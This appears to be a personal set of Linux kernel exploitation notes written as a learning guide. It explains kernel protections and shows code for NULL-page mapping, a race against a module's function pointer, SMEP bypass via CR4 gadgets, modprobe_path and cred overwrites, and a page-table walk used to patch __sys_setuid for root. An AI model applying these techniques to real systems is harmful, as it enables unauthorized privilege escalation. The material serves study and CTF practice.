Kernel Exploitation Notes

These are my kernel exploitation notes. They also include a set of code snippets & helper scripts to make exploitation faster in the future.

What you will find here:

I'll try to make it as simple as possible, in case anyone needs this in the future. However, this assumes a minimum knowledge of binary exploitation (stack, heap, protections...), so user-land exploitation will not be explained here. This is meant to introduce kernel exploitation & dive into it.

I'll be updating this as I make progress. I may mess up sometimes and I may be wrong in some details; I'll fix that whenever I find out about it. So if you find something weird or something wrong, please let me know and I'll fix it or add more details if needed. It'll be much appreciated.

What we'll go through:

Resources
What's a kernel?
User space VS Kernel space
Kernel Protections
From user to kernel & vice versa
Kernel Credentials
How to exploit?
Attacking Techniques

Resources

More resources will be included below.

What's a kernel?

The kernel connects hardware with software: it provides an abstraction layer that applications (executing in userland) use to interact with the hardware. It's basically the brain of the OS.

User space VS Kernel space

Kernel space is what we call Ring 0 (See below for reference). This has access to everything BUT in the hard way, no easy access/abstractions. Basically, any privilege escalation exploit that's related to the linux kernel, or "jailbreaking" for iOS & consoles, involves exploiting kernel code to gain a higher privilege, then returning to user space with the new privilege.

User space is what we are in all of the time. Every single app you run or use (doesn't matter which permission you used to run it) will be in user space. This is the last ring, which is the least privileged one.

Now, how do these spaces connect? Interrupts.

When we say interrupts, there is a large list of possible interrupts that may happen. For example, pressing a key on the keyboard (like the Ctrl+C that ends up as a SIGINT) would result in an interrupt, receiving a network packet would result in an interrupt...

There are also system calls (syscall.sh). Each syscall enters the kernel in a similar way: through a software interrupt (int 0x80) on 32-bit x86, or through the dedicated syscall instruction on x86-64.

The kernel will handle each of these accordingly. For example, for an open syscall, it'll look up the file, handle access permissions, open it & return a file descriptor. (Not many details, just an abstract view for now)

Now, take hardware as an example: there are a lot of brands, versions & models for a very specific device, say a keyboard. The kernel will be handling the communication with this device, yes, but how does it know everything? How does it know how to communicate with various devices, with different versions & so on?

Here we introduce modules. What if you want to extend your OS? Design a new feature & you need kernel access? How would it be possible? Ofc, you can write your own kernel but that's not a very friendly solution. We have modules to save us! A module is a piece of code that can be loaded into & unloaded from the kernel, and that'll be able to handle specific interrupts. We can use the commands lsmod, rmmod & insmod to manage our modules (Ofc, you need root permissions).

In theory, a module could run in ring 1/2, but linux does not use those rings, so our modules will be running in ring 0, at kernel level.

In linux, a device (for example, your memory or storage device) is exposed as a virtual file for you to communicate with, located under /dev, and it's the device's module that is responsible for creating it! Ofc, a module doesn't have to create a device file under /dev, it can for example add a new syscall or something else!

When we say User Space (or user land), we say stack, heap, ASLR, RELRO, PIE, NX... Moving on to Kernel Space, this memory space is 100% separate from the userland: it has its own stack, heap, memory address range... There are also different types of protections.

Kernel Protections

Base knowledge:

We have 2 different spaces, kernel space & user space. User space contains user app's code + data (memory), Kernel space contains kernel code & memory.

Control Registers:

A control register is used to control the behavior of the CPU. x86-64 CPUs have several of them; the one we care about here is CR4. For example, if bit 20 is set to 1, SMEP is enabled, and bit 21 does the same for SMAP. More about this register can be found here.

SMEP: Supervisor Mode Execution Protection

This protection basically prevents the execution of code from user space when we are in kernel context.

SMAP: Supervisor Mode Access Protection

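This protection prevents the kernel from reading or writing user space memory while in kernel context, other than through some specific functions that are meant for that (copy_from_user, copy_to_user...), which temporarily lift the restriction. Blocking execution of user space code is SMEP's job.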

Kallsyms

This is a file located at /proc/kallsyms.

Now, the kernel can be considered as any other ELF binary, it has code, it has functions, it has symbols. This file gives us all of the kernel symbols with their associated addresses. It's like a /proc/self/maps but with more details.

However, this file is restricted on some kernels (see the kptr_restrict sysctl), making it return 0 for symbol addresses for low privileged users. Always check in case it's exposed, you never know.

mmap_min_addr

This protection sets the lowest address that mmap will accept from an unprivileged process, protecting against NULL pointer dereferences. A NULL pointer dereference in the kernel accesses address 0 (or a small offset from it), so if a user space application could map that low range, it would control what the kernel reads or executes there.

KASLR

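This is similar to ASLR for userspace: the kernel's base address is randomized at each boot, so kernel addresses have to be leaked before they can be used.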

Kernel Page-Table Isolation (KPTI)

This protection was introduced after Meltdown vulnerability, which used speculative execution added in CPUs to read protected memory addresses, such as kernel space addresses. The vulnerability uses a time-based attack using CPU cache to detect whether or not an instruction has been executed, and since CPUs did not implement checks on protected addresses in speculative execution, an attacker can successfully execute read operations from a protected memory address. For more on this, feel free to check wiki page or this youtube video explaining both Meltdown & Spectre vulnerabilities.

In order to fix these vulnerabilities, CPU manufacturers couldn't change the design of already existing CPUs, therefore a software fix had to be created. This led to the introduction of a new protection in the linux kernel (& other OS kernels) called Kernel Page-Table Isolation (KPTI), which consists of separating the page tables used in kernel mode & in user mode.

Starting off with what's a memory page? Basically, a memory page is a fixed-size block of memory (usually 4 KiB). The physical memory is divided into pages, and page tables map the virtual pages of each process onto them.

Previously, both the kernel memory space & the user memory space were mapped in the same set of page tables, which is what let Meltdown reach kernel memory from user mode. With KPTI, kernel mode & user mode use different page tables: the kernel mode tables include both the user memory space & the kernel memory space, while the user mode tables include only the user memory space & a small section of kernel memory space (needed to enter and leave the kernel).

This separation prevents unauthorized access to protected memory in user mode execution.

From user to kernel & vice versa

We'll take a system call as an example. The moment you execute syscall (or int 0x80 if you're on x86), the CPU switches to kernel mode. The kernel will handle this request, by having a module for example handling that specific call.

The kernel will save the user space context (RIP, stack address, flags...) then switch to a kernel context.

Returning now from kernel to a user context, the kernel needs to restore the user context then jump back to where it stopped. To restore the context, we have 2 steps:

- swapgs: This is for the 64-bit architecture. The instruction swaps the current gs base with a value saved in a model-specific register, so that gs refers either to a memory location in the running application or to a location in the kernel's space. This is a requirement for switching contexts!
- iretq/sysretq: Either of these can be used to perform the actual switch from kernel land back to user land.
  - iretq requires five user land register values on the stack in this order: rip, cs, rflags, rsp, ss. So, we have to push them in the reverse order before executing it.
  - sysretq, when executed, moves the value in rcx to rip, which means we have to set up our return address there. Additionally, it loads rflags from r11, which may require additional handling. Finally, sysretq expects the value in rcx to be in canonical form, which basically means that bits 48 through 63 of that value must be identical to bit 47 (compare sign extension). If that's not the case, we run into a general protection fault! The sysret instruction seems to have stricter constraints, but it involves fewer registers and is generally faster.

There is also the option to use the sysexit instruction (doc), which takes the RDX value & sets it as RIP, and the RCX value & sets it as RSP (EDX & ECX in 32-bit mode).

The use of sysexit is linked to Fast System Calls, which simplifies the process a lot and requires less work! This will also work on both x86 & x86-64 architectures. For Fast System Calls, AMD offers the SYSCALL/SYSRET pair, while Intel offers SYSENTER/SYSEXIT.

Kernel Credentials

Okay, so our main goal is to escalate our privileges, therefore, we'll need to go through this. In linux, every thread has a task_struct structure containing its information, including the thread's credentials: the structure holds a pointer to a struct cred (Reference: task_struct)

So, if we can change our current thread's cred structure, we can escalate our privileges! Luckily, there are 2 kernel functions that can help with this:

prepare_kernel_cred: Calling prepare_kernel_cred(NULL) will create a new structure for us with root privileges! Ain't that something? (Newer kernels, 6.2 and later as far as I know, reject NULL here, so this applies to older ones.)
commit_creds: This function takes a cred structure & applies it to our current thread, so basically we'll be calling commit_creds(prepare_kernel_cred(NULL)) to become root.

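Both of these are ordinary kernel functions, so they follow the kernel's calling convention: on x86-64, parameters are passed through rdi, rsi, rdx... (System V), while 32-bit x86 kernels are built with regparm(3), a fastcall-like convention that passes them through eax, edx, ecx.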

How to exploit?

This is a basic section, we'll go into more detail later on with more examples. What we'll mainly be doing is interacting with linux modules. A module can create a device file located in /dev, add a new syscall or register a character device. There might be some other ways too, since a module runs at kernel level.

For a device file, you can simply open the file & interact with it (R/W):

dev = open(MOD_DEV, O_RDWR);
read(dev, buff, size);
write(dev, buff, size);

Or if it's a syscall, you should know what you can do already since you're here.

Last, you can use ioctl to communicate with the module. We'll get more info on this later.

Attacking Techniques

Buffer overflow

A buffer overflow vulnerability in kernel land is similar to user land: we might face a canary if it's enabled, in which case we will have to leak it, and eventually we can do a ROP chain (will be discussed below)... There is not much to talk about here.

Null pointer dereferences

On today's systems, there's a minimum value for the addresses that can be mmaped by non-root users. To view this on your system, you can check

cat /proc/sys/vm/mmap_min_addr

So what's this exploit about?

If we have the following code:

struct something{
  int (*fn_ptr)(void* param);
} x;

int main(void){
  // x is a zero-initialized global, so fn_ptr is NULL here.
  return x.fn_ptr(0);
}

As an initial value, x.fn_ptr should be NULL, which means 0. This would result in a memory error, but what if we can allocate a memory chunk starting at address 0x0? The above code would actually work if we set a proper value!

So what we can do is

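int main(void)
{
  // Map one RWX page at address 0 (needs mmap_min_addr = 0).
  mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);

  // Placeholder bytes; a real exploit would copy shellcode here.
  unsigned long *p = 0;
  p[0] = 0xdeadbeef;

  return x.fn_ptr(0);
}

And this will jump to address 0 and execute whatever we placed there (here the 0xdeadbeef placeholder bytes) instead of crashing right away! Ofc the mmap call wouldn't work if your /proc/sys/vm/mmap_min_addr is not 0, and that's one of the protections we talked about earlier.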

Concurrent execution

In user-space applications, when we write a function & we do not use any sort of concurrent execution methods (e.g. threads), we should be safe from concurrent execution attacks.

Now, looking into kernel-space, things are a bit different. Let's suppose we have this kernel module:

struct module_struct {
  ssize_t (*fn_pointer)(void);
} global_instance;

static ssize_t some_valid_function(void)
{
  // ...
}


static ssize_t module_read(struct file *f, char __user *buf, size_t len, loff_t *off)
{
  // No lock: fn_pointer may be NULL if module_write is running concurrently.
  return (global_instance.fn_pointer)();
}

static ssize_t module_write(struct file *f, const char __user *buf, size_t len, loff_t *off)
{
  // ...
  global_instance.fn_pointer = 0;
  // ... (race window)
  global_instance.fn_pointer = &some_valid_function;
  return len;
}

At first glance, this code might seem safe. However, once you become aware that calls to module_read & module_write from user-space programs can be executed in parallel, this opens the door for a race in order to get a null pointer dereference.

To simplify things, we'll use a null pointer dereference & consider that we are able to allocate address 0x0 (mmap_min_addr = 0).

How can we attack this piece of code? Simply run multiple threads or use a fork, one will call module_write & the other will call module_read. Then hope that the gap between global_instance.fn_pointer = 0; & global_instance.fn_pointer = &some_valid_function; is long enough to give you a chance to call fn_pointer while it's still NULL.

Example using fork:

int main(void){
  char shellcode[] = "...";
  char tmp[5], buff[64] = {0};

  // Map address 0 and place the shellcode there (needs mmap_min_addr = 0).
  mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
  memcpy(0, shellcode, sizeof(shellcode));

  int dev = open_dev();
  if (fork() == 0)
  {
    read(dev, tmp, sizeof(tmp));
    // Child becomes root if we are lucky enough.
  }
  else
  {
    write(dev, buff, sizeof(buff));
  }
  return 0;
}

Bypassing SMEP

To check for SMEP, we can check /proc/cpuinfo for smep flag. We can run cat /proc/cpuinfo | grep smep to get direct results.

As we talked earlier about Control Registers, they are simply registers. This means we can change their values using assembly instructions. A mov to cr4 only accepts a register as its source, so for example executing mov rax, 0x407e0 followed by mov cr4, rax will disable SMEP for us! What's important here is to use a value with bit 20 set to 0. This value can be a constant: you can get it by reading the current CR4 while debugging and clearing bit 20.

How to do that now? Well, since we cannot execute user-space code, it'll be either a shellcode in kernel-space OR our good old friend, ROP chains.

ROP Chains

A ROP chain in kernel-space is the same as we are used to before in user land. We have a bzImage or a vmlinuz, which contains the compressed linux kernel. To search for ROP gadgets, we will have to decompress it. You can find here a useful bash script to automatically decompress it. Usage like following:

./extract-image.sh ./bzImage > vmlinux

Now, examining our vmlinux file, we find it's an ELF & we can run ropper to find ROP gadgets!

Going back to bypassing SMEP, we might stumble upon these 2 gadgets:

mov cr4, eax; pop ebp; ret;
pop eax; ret;

If you are already familiar with ROP chains in user land, you know that these two are enough to change the value of the CR4 register & therefore disable SMEP.

Arbitrary Write

Let's suppose we currently have an arb. write vulnerability, how can we make use of this?

Starting off with modprobe_path. What happens when you run a file with unknown magic bytes in linux? Just to be clear here, magic bytes are the first few bytes of a file; they are used to identify its format (the "extension", if you are a windows user) and how it should be executed. Now, if these magic bytes are unknown, the linux kernel runs a program called modprobe to try to load a module that can handle this file. Luckily for us, the kernel stores the path of modprobe in a memory variable, called modprobe_path! On top of this, modprobe is executed as root! We cannot ask for more at this point.

So, the strategy is overwriting modprobe_path to a controlled binary/shell script that'll give us root privileges later on. Simple right?

A much more detailed doc is kernelpwn by smallkirby, which is definitely worth looking at! (It has a lot of other interesting stuff worth checking too)

One important condition for this technique to work is CONFIG_STATIC_USERMODEHELPER must not be defined (when building the kernel). That is used to hard-code the value of modprobe path, the variable modprobe_path will still exist but overwriting it will be useless! In order to verify if it's defined or no, we can execute the following:

/ # cat /proc/kallsyms | grep call_usermodehelper_setup
ffffffff810c8c80 T call_usermodehelper_setup
ffffffff82458118 r __ksymtab_call_usermodehelper_setup
ffffffff82477e3d r __kstrtab_call_usermodehelper_setup
ffffffff8247c3c4 r __kstrtabns_call_usermodehelper_setup

The above is the case when CONFIG_STATIC_USERMODEHELPER is defined. Another method to verify would be checking call_usermodehelper_setup disassembly. For more details check this out (by smallkirby).

Another way to gain root would be overwriting cred structure for the current thread. A good reference to this is this writeup.

Basically, the linux kernel keeps track of each process' credentials in a struct, containing the task's uid & gid. Overwriting these with 0 will give us root. This technique however requires a memory read to find the cred structure of the current process in memory.

You can find the structure definition here, this is an old version and only used as an example.

Another technique is changing the kernel's code! But you might ask, the kernel code should be in a R-X memory page no? Right, and we will change that!

Our first option is changing the CR0 register: by setting bit 16 (WP, Write Protect) to 0, we become able to write to read-only pages when we are in kernel mode. Another option is to update the page permissions, one great writeup that'll guide us through this is OverTheWire Advent Bonanza 2018 - Snow Hammer.

Let's take an example, we will try to change the code of __sys_setuid function located at 0xffffffff81031f5e.

First, we need to understand how pages are managed by the kernel. We start with Page Map Level 4 table, we can find the physical address of this structure by inspecting CR3 register.

Now, how can we access this physical memory? We can make use of qemu's monitor in order to dump the physical memory into a file, we can do so by adding -monitor tcp::5555,server,nowait to qemu's args & later connecting to the specified port, we can use telnet to do so.

After connecting, we can view registers (or can use gdb for this too) & save the physical memory:

(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
CR0=80050033 CR2=0000000000dc57b8 CR3=000000000775a000 CR4=000006b0

We can now view the physical memory at 0x000000000775a000, this is the Page Map Level 4 table.

$ xxd -e -g8 -c8 -a -s 0x775a000 -l 0x1000 memdump
0775a000: 8000000007745067  gPt.....
0775a008: 0000000000000000  ........
*
0775a7f8: 8000000007771067  g.w.....
0775a800: 0000000000000000  ........
*
0775a880: 0000000001b47067  gp......
0775a888: 0000000000000000  ........
*
0775ac90: 0000000000080067  g.......
0775ac98: 0000000000000000  ........
*
0775aea0: 0000000006370067  g.7.....
0775aea8: 0000000000000000  ........
*
0775afe0: 0000000006b6f067  g.......
0775afe8: 0000000000000000  ........
0775aff0: 0000000000000000  ........
0775aff8: 0000000001a16067  g`......

Examining the address we are looking for now:

0xffffffff81031f5e = 0b 1111111111111111 111111111 111111110 000001000 000110001 111101011110
                                         PML4      PDPT      PD        PT        offset

We have our PML4 index "111111111" = 511; multiplied by the entry size 8, we have our offset at 0xff8. This gives us 0775aff8: 0000000001a16067, an entry holding the physical address of the next table. The 0x67 at the end are flags we can ignore, which leaves 0x01a16000.

Continuing, we examine the physical address 0x01a16000, containing the Page Map Level 3 table (the page directory pointer table, PDPT):

$ xxd -e -g8 -c8 -a -s 0x0000000001a16000 -l 0x1000 memdump
01a16000: 0000000000000000  ........
*
01a16ff0: 0000000001a17063  cp......
01a16ff8: 0000000001a18067  g.......

After calculating the offset (0b111111110 * 8 = 0xff0), this gives us 01a16ff0: 0000000001a17063. Same as earlier, the 0x63 are flags.

Now, we have the next-level table (the page directory) at address 0x01a17000. We can examine this physical address:

$ xxd -e -g8 -c8 -a -s 0x0000000001a17000 -l 0x1000 memdump
01a17000: 0000000000000000  ........
*
01a17040: 00000000010001e1  ........
01a17048: 00000000012001e1  .. .....
01a17050: 00000000014001e1  ..@.....
01a17058: 0000000007869163  c.......
01a17060: 80000000018001e1  ........
01a17068: 0000000007868063  c.......
01a17070: 0000000000000000  ........
*
01a17ff8: 0000000000000000  ........

Same as earlier, we calculate our offset (0b000001000 * 8 = 0x40), which gives us 01a17040: 00000000010001e1. Bit 7 (page size) is set in this entry, so it maps a 2 MiB page directly and the walk stops here: this value contains our page flags!

Now, we have to find the virtual address that's pointing to this physical address. We can examine info tlb in qemu monitor to identify the base virtual address that's mapped to the table holding our entry, in our case 0xffffffff81a17000. We can also confirm this in gef by running xinfo:

gef> xinfo 0xffffffff81a17000
---------------------------------------------------------------- xinfo: 0xffffffff81a17000 ----------------------------------------------------------------
Virtual address start-end              Physical address start-end             Total size   Page size   Count  Flags
0xffffffff81a00000-0xffffffff81c00000  0x0000000001a00000-0x0000000001c00000  0x200000     0x1000      512    [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped):  0xffffffff81a00000 + 0x17000
Offset (from phys mapped):  0x1a00000 + 0x17000

Back to the 00000000010001e1 we found, in binary format below are some flags:

0b1000000000000000111100001
                        |||_ Present bit
                        ||__ Writeable flag (we will flip this)
                        |___ User-Accessible flag

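The Writeable flag is 0 in our entry, so the kernel code it maps is read-only. The page that holds the entry itself, however, is mapped RW (see the xinfo output above), so an arbitrary write can flip that flag!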

After changing .text segment to RWX, we will either write a shellcode or patch an existing function. An example of a patch we can do is to change setuid handler. We can see below setuid code:

long __sys_setuid(uid_t uid)
{
    [...]
    new = prepare_creds();
    [...]
    return commit_creds(new);
}

One potential patch is to change prepare_creds to prepare_kernel_cred, and we can obtain root credential that will be passed to commit_creds.

Let's take an example:

0xffffffff81031f5e: __sys_setuid
0xffffffff81039cab: prepare_creds
0xffffffff81039ea6: prepare_kernel_cred

Examining the assembly:

gef> x/20i 0xffffffff81031f5e
   0xffffffff81031f5e:  cmp    edi,0xffffffff
   0xffffffff81031f61:  mov    rax,0xffffffffffffffea
   0xffffffff81031f68:  je     0xffffffff81032016
   0xffffffff81031f6e:  push   r12
   0xffffffff81031f70:  push   rbp
   0xffffffff81031f71:  mov    ebp,edi
   0xffffffff81031f73:  push   rbx
   0xffffffff81031f74:  push   rcx
   0xffffffff81031f75:  call   0xffffffff81039cab
   0xffffffff81031f7a:  mov    rbx,rax

We are interested in the call 0xffffffff81039cab instruction. Patching it to call 0xffffffff81039ea6 only changes the low 2 bytes (16 bits) of the call's relative offset (0x7d31 becomes 0x7f2c), and that small write is enough to give us root when executing the setuid syscall.
